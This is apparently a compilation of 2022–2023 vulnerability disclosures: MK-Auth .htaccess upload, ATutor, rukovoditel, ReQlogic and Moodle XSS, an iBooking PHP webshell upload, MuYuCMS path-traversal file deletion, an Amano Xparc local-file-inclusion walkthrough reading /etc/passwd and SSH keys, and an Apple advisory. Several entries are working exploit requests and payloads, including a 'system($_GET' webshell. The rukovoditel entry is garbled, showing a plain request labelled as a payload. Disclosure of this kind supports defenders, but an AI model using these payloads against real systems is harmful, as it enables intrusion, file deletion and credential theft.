An arbitrary file upload vulnerability in the Virtual Disk of MK-Auth 23.01K4.9 allows attackers to execute arbitrary code via uploading a crafted .htaccess file.

**IntruderLabs ZirouDei Project**

Date: 2023-05-25

Discoverer: Alan Lacerda (ifundef)

Exploit Coder: Alan Lacerda (ifundef) | Yueslly Lisbooa (0xC4CTU$)

**Vulnerability**

Mk-Auth Remote Command Execution (RCE) via Unrestricted Upload

**Product Description**

Mk-Auth is a Brazilian Management System for Internet Service Providers used to control client access and permissions via a web interface panel.

**Vulnerability Description**

It is possible to upload a crafted .htaccess files to the Virtual Disk. This vulnerability may be used to gain Remote Command Execution to the server.

**Additional Information:**

The application does not allow .php files to be uploaded but, by sending a crafted .htaccess an attacker may instruct the server to use php interpreter to any other file extention (even a random one like \*.labs).

**Vulnerability Type:**

CWE-434: Unrestricted Upload of File with Dangerous Type

**Vendor:**

Mk-Auth

**Affected Product:**

MK-Auth <= 23.01K4.9

**Affected Component:**

Virtual Disk

**Attack Vector:**

Remote

**Code Execution:**

Yes

**Attack Vector:**

Any client of the Internet Service Provider that has access to the platform (to download billings and request for support) and has the Virtual Disk feature, may exploit this vulnerability.

**Reference:**

http://mk-auth.com.br/

CVE-2023-27246: 2023-05-25-ziroudei/README.md at main · intruderlabs/2023-05-25-ziroudei

A Cross-site scripting (XSS) vulnerability in the function encrypt_password() in login.tmpl.php in ATutor 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the token parameter.

**Introduction**

While conducting a case study, I discovered a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1. Versions higher than 2.2.1 were also tested and I confirmed that they are not vulnerable to this attack.

**Reflected Cross-Site Scripting (XSS)**

The vulnerability exists in login.tmpl.php and login\_functions.inc.php, and it can be exploited in login.php via a POST request. Login.php accepts a token parameter. The below is partial code in login\_functions.inc.php.

    if (isset($_POST['token']))
    {
        $_SESSION['token'] = $_POST['token'];
    }

The code sets $\_SESSION\[‘token’\] to the submitted value of the token parameter via a POST request. Next is partial code in login.tmpl.php.

    function encrypt_password() {
            document.form.form_password_hidden.value = hex_sha1(hex_sha1(document.form.form_password.value) + "<?php echo $_SESSION['token']; ?>");
            document.form.form_password.value = "";
            return true;
    }

Within the function here, it plainly echoes out a string given to the token parameter.

Figure 1 – Submission of a POST request with the token parameter

Figure 2 – Response to Figure 1 with a reflected value

An input is reflected. It should be tested to check if there is any sanitization for special characters. The same request with a different token **asdf'”!@#$%^&\*)}** was sent.

Figure 3 – Unsanitized reflected value

It can be confirmed that the input is not sanitized at all. With this knowledge, the following payload can be crafted and sent.

    asdf");}alert(1);+function+asdf()+{//

Figure 4 – Response to the request with the payload

The payload successfully closes the function **encrypt\_password()**, injects **alert(1);**, and deinfes a dummy function **asdf()** to close the trailing closing curly bracket. It also comments out the trailing part of the line starting with **hex\_sha1(document**.

Figure 5 – Reflected XSS

It can be confirmed that the payload **alert(1)** successfully executed. This XSS is also possible through cross-site request forgery (CSRF).

Figure 6 – CSRF proof of concept code

Hosting and navigating to this file also resulted in the alert(1) function in the payload being executed.

**Later Versions**

The same attack is confirmed mitigated and not exploitable in later versions. I suspect when other similar attacks were reported to the developers when the web application was actively developed, the prevention mechanism put in place stopped reported attacks, including this seemingly new XSS, altogether.

**Thoughts**

Input sanitization is always an important part of web application development.

**Log**

*   2023-02-16 CVE request was submitted. The author of ATutor was not contacted since ATutor was no longer supported and maintained at the time of the writing.
*   2023-03-28 The vulnerability was assigned CVE-2023-27008 and published.

**Post navigation**

CVE-2023-27008: [CVE-2023-27008] ATutor 2.2.1 Cross-Site Scripting via the Token Body Parameter

rukovoditel version 3.2.1 suffers from a cross site scripting vulnerability.

    ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS)## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://www.rukovoditel.net/## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1## Description:The application is vulnerable to DOM-based cross-site scriptingattacks. Data is read from `location.hash` and passed to`jQuery.parseHTML`.The attacker can use this vulnerability to create an unlimited numberof accounts on this system until it crashed.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```POSTGET /rukovoditel/index.php?module=users/restore_password HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63Safari/537.36Connection: closeCache-Control: max-age=0Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg;cookie_test=please_accept_for_session;app_login_redirect_to=module%3Ddashboard%2FUpgrade-Insecure-Requests: 1Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/loginSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1)## Proof and Exploit:[href](https://streamable.com/i1qmfk)## Time spent`3:45`

rukovoditel 3.2.1 Cross Site Scripting

iBooking version 1.0.8 suffers from a remote shell upload vulnerability.

    # Exploit Title: iBooking v1.0.8 - Arbitrary File Upload# Exploit Author: d1z1n370/oPty# Date: 01/11/2022# Vendor Homepage: https://codecanyon.net/item/ibooking-laravel-booking-system/30362088# Tested on: Linux# Version: 1.0.8# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.# PoC request POST https://localhost/dashboard/upload-new-media HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://localhost/dashboard/settingsX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------115904534120015298741783774062Content-Length: 449Connection: closeCookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="_token"kVTpp66poSLeJVYgb1sM6F7KIzQV2hbVfQLaUEEW-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="is_modal"1-----------------------------115904534120015298741783774062Content-Disposition: form-data; name="file"; filename="upload.php56"Content-Type: image/gifGIF89a;<?php system($_GET['a']); phpinfo(); ?>-----------------------------115904534120015298741783774062--

iBooking 1.0.8 Remote Shell Upload

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

**ReQlogic 11.3 Cross Site Scripting**

Posted Mar 28, 2023

Authored by Okan Kurtulus

ReQlogic version 11.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2022-41441

SHA-256 | 5227ba88f59a5d4cccd1b7cd664927cd29c2794c9b0bb18836fe0f6ab3662551

Download | Favorite | View

**ReQlogic 11.3 Cross Site Scripting**

    # Exploit Title: ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)# Date: 9 October 2022# Exploit Author: Okan Kurtulus# Vendor Homepage: https://reqlogic.com# Version: 11.3# Tested on: Linux# CVE : 2022-41441# Proof of Concept:1- Install ReQlogic v11.32- Go to https://localhost:81/ProcessWait.aspx?POBatch=test&WaitDuration=33- XSS is triggered when you send the XSS payload to the POBatch and WaitDuration parameters.#XSS Payload:</script><script>alert(1)</script>#Affected PrametersPOBatchWaitDuration#Final URLshttp://20.36.214.225:81/ProcessWait.aspx?POBatch=</script><script>alert(1)</script>&WaitDuration=3http://20.36.214.225:81/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(1)</script>

**File Tags**

*   ActiveX (932)
*   Advisory (80,599)
*   Arbitrary (15,917)
*   BBS (2,859)
*   Bypass (1,653)
*   CGI (1,022)
*   Code Execution (7,047)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,306)
*   DoS (22,932)
*   Encryption (2,359)
*   Exploit (50,720)
*   File Inclusion (4,180)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,689)
*   Intrusion Detection (876)
*   Java (2,957)
*   JavaScript (830)
*   Kernel (6,449)
*   Local (14,297)
*   Magazine (586)
*   Overflow (12,543)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,502)
*   Python (1,488)
*   Remote (30,282)
*   Root (3,534)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,824)
*   Shell (3,133)
*   Shellcode (1,206)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,171)
*   TCP (2,384)
*   Trojan (687)
*   UDP (880)
*   Virus (663)
*   Vulnerability (31,381)
*   Web (9,467)
*   Whitepaper (3,740)
*   x86 (946)
*   XSS (17,581)
*   Other

**File Archives**

*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (370)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,714)
*   Fedora (1,691)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,130)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,923)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,448)
*   UNIX (9,208)
*   UnixWare (185)
*   Windows (6,532)
*   Other

ReQlogic 11.3 Cross Site Scripting

Moodle LMS version 4.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Moodle LMS 4.0 - Cross-Site Scripting (XSS)# Date: 26/10/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://moodle.org/# Software Link: https://git.in.moodle.com/moodle# Version: 4.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3nozDescription:A Cross Site Scripting (XSS) vulnerability exists in Moodle is a free and open-source Learning Management System (LMS) written in PHP and distributed under the GNU General Public LicenseVulnerable Code:line 111 in file "course/search.php"echo $courserenderer->search_courses($searchcriteria);Steps to exploit:1) Go to http://localhost/course/search.php2) Insert your payload in the "search"Proof of concept (Poc):The following payload will allow you to run the javascript -"><img src=# onerror=alert(document.cookie)>

Moodle LMS 4.0 Cross Site Scripting

Apple Security Advisory 2023-03-27-5 - macOS Big Sur 11.7.5 addresses bypass, code execution, integer overflow, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-03-27-5 macOS Big Sur 11.7.5

macOS Big Sur 11.7.5 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213675.

Apple Neural Engine  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23540: Mohamed GHANNAM (@_simo36)

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26702: an anonymous researcher, Antonio Zekic  
(@antoniozekic), and John Aakerblom (@jaakerblom)

AppleMobileFileIntegrity  
Available for: macOS Big Sur  
Impact: A user may gain access to protected parts of the file system  
Description: The issue was addressed with improved checks.  
CVE-2023-23527: Mickey Jin (@patch1t)

Archive Utility  
Available for: macOS Big Sur  
Impact: An archive may be able to bypass Gatekeeper  
Description: The issue was addressed with improved checks.  
CVE-2023-27951: Brandon Dalton of Red Canary and Csaba Fitzl  
(@theevilbit) of Offensive Security

Calendar  
Available for: macOS Big Sur  
Impact: Importing a maliciously crafted calendar invitation may  
exfiltrate user information  
Description: Multiple validation issues were addressed with improved  
input sanitization.  
CVE-2023-27961: Rıza Sabuncu (@rizasabuncu)

Carbon Core  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved checks.  
CVE-2023-23534: Mickey Jin (@patch1t)

ColorSync  
Available for: macOS Big Sur  
Impact: An app may be able to read arbitrary files  
Description: The issue was addressed with improved checks.  
CVE-2023-27955: JeongOhKyea

CommCenter  
Available for: macOS Big Sur  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2023-27936: Tingting Yin of Tsinghua University

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-27935: Aleksandar Nikolic of Cisco Talos

dcerpc  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected system  
termination or corrupt kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-27953: Aleksandar Nikolic of Cisco Talos  
CVE-2023-27958: Aleksandar Nikolic of Cisco Talos

Find My  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23537: an anonymous researcher

Foundation  
Available for: macOS Big Sur  
Impact: Parsing a maliciously crafted plist may lead to an unexpected  
app termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2023-27937: an anonymous researcher

Identity Services  
Available for: macOS Big Sur  
Impact: An app may be able to access information about a user’s  
contacts  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-27928: Csaba Fitzl (@theevilbit) of Offensive Security

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to unexpected  
app termination or arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2023-27946: Mickey Jin (@patch1t)

ImageIO  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may result in  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-23535: ryuzaki

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2023-23514: Xinru Chi of Pangu Lab and Ned Williamson of Google  
Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to disclose kernel memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2023-28200: Arsenii Kostromin (0x3c3e)

NetworkExtension  
Available for: macOS Big Sur  
Impact: A user in a privileged network position may be able to spoof  
a VPN server that is configured with EAP-only authentication on a  
device  
Description: The issue was addressed with improved authentication.  
CVE-2023-28182: Zhuowei Zhang

PackageKit  
Available for: macOS Big Sur  
Impact: An app may be able to modify protected parts of the file  
system  
Description: A logic issue was addressed with improved checks.  
CVE-2023-27962: Mickey Jin (@patch1t)

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-23542: an anonymous researcher

System Settings  
Available for: macOS Big Sur  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved  
validation.  
CVE-2023-28192: Guilherme Rambo of Best Buddy Apps (rambo.codes)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating to Vim  
version 9.0.1191.  
CVE-2023-0433  
CVE-2023-0512

XPC  
Available for: macOS Big Sur  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with a new entitlement.  
CVE-2023-27944: Mickey Jin (@patch1t)

Additional recognition

Activation Lock  
We would like to acknowledge Christian Mina for their assistance.

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
(wojciechregula.blog) for their assistance.

CoreServices  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance.

NSOpenPanel  
We would like to acknowledge Alexandre Colucci (@timacfr) for their  
assistance.

Wi-Fi  
We would like to acknowledge an anonymous researcher for their  
assistance.

macOS Big Sur 11.7.5 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmQiHnwACgkQ4RjMIDke  
Nxks0hAAquqDdtX6QvjVigRuSd2bpQny1TxVp62Zo47F9YkrvuvKVvJjaFzQJNjE  
p2Oq3BgNBkUqei26w8GLqwbg8szhCIPCOVHFcGDTPGrf53oWLlPc6WZxn8ihZOo4  
r3rxH4MGFSb+dBwWnF6GVX1EBcVjO08FwOzgNqkh2baqSU0iuxnSRW9XYmzwhG1w  
bj86kfnCooSLJlUTiTbXxN8W/vmfwRWONXQTkkOa47knWSKH9QBzzfAJKbil6sRE  
hDiYdtXUER//PApErvjl5i6b5wRQ0KQ19X//XfZzJtWCPuh0/nw7ducHJg+DpPUc  
EfNINhPKauqUvw516EvDuW0yVIlyMrfNCJOpHwQkmCfqx2i6l1+U5M8yqsyVcpbe  
Nbs6LYMNvDalLnazRRA3oT3036MrnCWem/M1afTrsoHYnhYb8FMx9gI3GV2Swgud  
fJrPttdjtpwlrCF60KsquJEvmcrNFwKk+QKS8Gbe8bbJSPk1AGsHN1JivFNiC036  
fycIK1ffwPHPYJgF6rLCOQ9q+DHRTw+lR0UrGmRplrjVBwt9cdiuLaeJZWPyGMwP  
P5QYlkULAE+5B4HKqzKMFYPkoEMzmvdOsgbhcg7OSmP1PAiAW6m7HnOmDAX7E2El  
03qFLcjb1GxM/U+lKN5Xx4rH+BR0yrEx20oZGX9Vymn7UJVYlDI=  
=xOHM  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-03-27-5

MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /database/sqldel.html.

Vulnerability exists in sqldel.html  
1、 We put a txt file in the root of our website with the file name test.txt.  
2、Constructing packets after logging into the backend

    POST /admin.php/database/sqldel.html HTTP/1.1
    Host: test.test
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://test.test
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://test.test/editor/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 19
    
    name=../../test.txt

CVE-2023-27701: MuYucms sqldel.html has Arbitrary file deletion vulnerability · Issue #9 · MuYuCMS/MuYuCMS

amano Xparc parking solutions 7.1.3879 was discovered to be vulnerable to local file inclusion.

**Introduction**

Hello everyone, during one of the penetration testing assessments, we faced Amano Xparc parking solution web application. While conducting the assessment we discovered multiple vulnerabilities and we submitted it to https://cve.mitre.org/. For your reference the links for the other CVEs blogs:

*   **SQL injection CVE-2023–23331:** https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c

Today I will be demonstrating CVE-2023–23330.

**Vulnerability Details**

*   **Vulnerable Software**: Amano Xoffice parking solutions
*   **Vulnerability:** Local File Inclusion
*   **Affected Version:** 7.1 (7.1.3879)
*   **Vendor Homepage:**https://www.amano.eu/en/
*   **CVE:** CVE**\-**2023–23330

**What is Local File Inclusion (LFI)?**

_“Local file inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application”_

_\- OWASP_

To simplify things, LFI is a vulnerability that abuses a flaw when a server tries to include a file. The idea is to let the include unattended files such as system files or non-published documents.

**Why LFI is there? and how to prevent it.**

It occurs due to the use of user input without validation.

Preventing LFI could be done by considering the following:

*   Avoid passing user-submitted input to the system.
*   Whitelist files that can be included.
*   Reject un-defined/Whitelisted document.
*   Do not permit file paths to be appended directly make them hard-coded.
*   Use databases instead of filesystems. Either to store the files in the database or store the file path in the database.

**CVE Demo**

While exploring the website manually, I noticed a page to download the user manual and guide. I intercepted the request in burp so I can use Burp repeater for easier request manipulation. The image below shows the parameter and user manual file:

So, clearly, the “file” parameter in the GET request is responsible for specifying the file name. interesting…

Let’s try to change the file name to “/etc/passwd” which is a default file in Linux/Unix servers and readable by all users. The image below shows the try to inject “/etc/passwd”:

So, it didn’t work directly, as the error shows in the HTTP response the file “../manuals/etc/passwd” was not found.

**No Problem!**

Instead of using the absolute path of “/etc/passwd” we will use the relative path. In file systems to get a file there are two main ways “absolute” or “relative”.

Now let’s fuzz the relative path to know what is the depth of the file. We can use Burp intruder, python scripts, or manually in Burp repeater. The image below shows the first try with a depth of 2 manually in the Burp repeater:

Didn’t work, let’s try depth 3

**It worked!**

We were able to include a file from the system without any validation.

The question now is, how to abuse that?

There are multiple ways to exploit this and gain more. Each case or scenario has its own way to go further. However, I may suggest looking into:

*   **Config files & Source code**: most of the time DB credentials, API tokens …etc. Are stored in clear-text format either in Config files or source code.
*   **Well-Known files**: You may try to access well-known files such as Shadow file, log files, bash history, SSH keys …etc.

For the sake of knowledge, let’s try an example of a source code and SSH key.

SSH key file

Version.php file

****Acknowledgment:****

I would like to thank the teammates: Fahad Almulhim (0xHunter) and Osama Aldosari. Also, many thanks to the Saudi information and technology company — SITE for their continuous support.

**References:**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23330
*   https://0xhunter20.medium.com/how-i-found-my-first-blind-sql-injection-cve-2023-23331-aef103a7f73c
*   https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

CVE-2023-23330: Amano Xparc Local File Inclusion (CVE-2023–23330) - Saleh - Medium

MuYuCMS v2.2 was discovered to contain an arbitrary file deletion vulnerability via the component /accessory/picdel.html.

Vulnerability exists in picdel.html  
1、 We put a txt file in the root of our website with the file name test.txt.  
2、Constructing packets after logging into the backend

    POST /admin.php/accessory/picdel.html HTTP/1.1
    Host: test.test
    Content-Length: 54
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://test.test
    Referer: http://test.test/admin.php/accessory/filelist.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    picdelur=/upload/files/.gitignore/../../../../test.txt

Tag

#php